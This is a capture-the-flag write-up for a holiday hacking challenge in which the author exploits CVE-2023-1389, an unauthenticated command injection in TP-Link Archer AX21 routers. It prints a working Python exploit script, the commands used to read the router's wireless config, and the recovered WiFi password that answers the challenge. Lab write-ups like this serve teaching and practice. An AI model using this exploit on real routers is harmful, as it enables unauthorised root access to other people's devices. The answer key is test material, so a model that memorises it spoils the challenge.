Skip to content

Dosis Network Down⚓︎

Dosis_Network_Down

Difficulty:
Direct link: Dosis Network Down
Area: 24-7
In-game avatar: Janusz Jasinski

Hints⚓︎

Version

I can't believe nobody created a backup account on our main router...the only thing I can think of is to check the version number of the router to see if there are any...ways around it...

UCI

You know...if my memory serves me correctly...there was a lot of fuss going on about a UCI (I forgot the exact term...) for that router.

Objective⚓︎

Request

Drop by JJ's 24-7 for a network rescue and help restore the holiday cheer.
What is the WiFi password found in the router's config?

Janusz Jasinski

Alright then. Those bloody gnomes 'ave proper messed about with the neighborhood's wifi - changed the admin password, probably mucked up all the settings, the lot.
Now I can't get online and it's doing me 'ead in, innit?
We own this router, so we're just takin' back what's ours, yeah?
You reckon you can 'elp me 'ack past whatever chaos these little blighters left be'ind?

High-Level Steps⚓︎

  1. Identify – Identify the router version and applicable vulnerabilities.
  2. Exploit – Execute commands via the command-injection vulnerability.
  3. Extract – Retrieve the WiFi credentials from the router configuration.
flowchart TD

  subgraph Row1["Identify"]
    direction LR
    A[Check router model and firmware]
    B[Research known vulnerabilities]
    C[Found CVE-2023-1389]
    A --> B --> C
  end

  subgraph Row2["Exploit"]
    direction LR
    D[Craft malicious request]
    E[Execute arbitrary command]
    D --> E
  end

  subgraph Row3["Extract"]
    direction LR
    F[Read wireless config file]
    G[Recover WiFi password]
    H[Objective completed]
    F --> G --> H
  end

  Row1 --> Row2
  Row2 --> Row3

Solution⚓︎

The challenge website notes the router firmware version and the hardware version at the bottom. 

https://dosis-network-down.holidayhackchallenge.com/

Dosis_Network_Down

TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 contained a command injection vulnerability in the country form of the /cgi-bin/luci;stok=/locale endpoint on the web management interface.
Specifically, the country parameter of the write operation was not sanitized before being used in a call to popen(), allowing an unauthenticated attacker to inject commands, which would be run as root, with a simple POST request.
Ref :
nvd.nist.gov

The Github /Voyag3r-Security/CVE-2023-1389 repository notes they were test teh reverse shell on 2.1.5 Build 20211231 rel.73898(5553); Hardware Version Archer AX21 v2.0
The script archer-file-transfer.py in that repo leverages a reverse shell.
We modify that script to just take any arbitrary command to execute.

CVE-2023-1389
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
import requests, urllib.parse, argparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# Suppress warning for connecting to a router with a self-signed certificate
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

parser = argparse.ArgumentParser()

parser.add_argument("-r", "--router", dest = "router", default = "192.168.0.1", help="Router name")
parser.add_argument("-p", "--payload", dest = "payload", default = "ls", help="attack payload")

args = parser.parse_args()

# Ashish Gupta -  Take an arbitrary command in the -payload switch to execute
payload = args.payload
url_command = "https://" + args.router + "/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(" + payload + ")"

# Send the URL twice to run the command. Sending twice is necessary for the attack
r = requests.get(url_command, verify=False)
r = requests.get(url_command, verify=False)
print(f'Command to execute :{payload}')
print("########## ---Output--- ########")
print(r.text)

Sending the ls command to list all files. 

python archer-rev-shell.py -r dosis-network-down.holidayhackchallenge.com -p 'ls'
Dosis_Network_Down

Sending the cat /etc/config/wireless to get the wireless config

python archer-rev-shell.py -r dosis-network-down.holidayhackchallenge.com -p 'cat /etc/config/wireless'

Dosis_Network_Down

The config shows the WiFi password as SprinklesAndPackets2025!

The answer is accepted.
Dosis_Network_Down

Answer

SprinklesAndPackets2025!

Response⚓︎

Janusz Jasinski

Brilliant work, that. Got me connection back and sent those gnomes packin' from the router.
Now I can finally get back to streamin' some proper metal. BTC tips accepted, by the way.

Learnings⚓︎

If I get the firmware version of the router, can search for any published vulnerabilities for that firmware, look for exploits available and use that against that router.

Prevention & Hardening Notes⚓︎

Keep router and network device firmware up to date